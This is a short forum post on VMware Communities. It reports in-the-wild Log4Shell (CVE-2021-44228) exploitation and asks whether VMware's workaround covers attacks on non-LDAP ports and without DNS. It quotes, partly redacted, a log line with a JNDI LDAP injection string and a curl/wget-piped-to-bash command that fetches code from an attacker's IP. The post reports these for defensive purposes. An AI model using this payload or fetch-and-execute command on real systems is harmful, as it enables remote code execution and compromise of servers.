VMware Communities
chris_x5
Contributor
Contributor
‎12-11-2021 02:33 AM

CVE-2021-44228 exploit on wild - issue with workaround and patches. need verification

CVE-2021-44228

 

Regarding https://www.vmware.com/security/advisories/VMSA-2021-0028.html
CVE-2021-44228

Please be aware that attackers are targeting servers also without DNS resolution.

45.155.205.233 - - [10/Dec/2021:14:23:29 +0100] "GET / HTTP/1.1" 200 300 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KG(cut_for_security)}"

Command that is send to systems:

(curl -s 45.155.205.233:5874/(ip_cut_for_security):80||wget -q -O- 45.155.205.233:5874/(ip_cut_for_security):80)|bash


On Vmware KB: https://kb.vmware.com/s/article/87086 - vmware is refering to traffic that comes on LDAP port, but as you can see above attackers are using dynamic ports to actually preform that attack. And also they are not using DNS for lookups in 40/60 cases.

Please verify if that is consistent with your KB and protection.

Thanks.
Chris

 

Labels (1)
Labels
Tags (1)
0 Kudos
0 Replies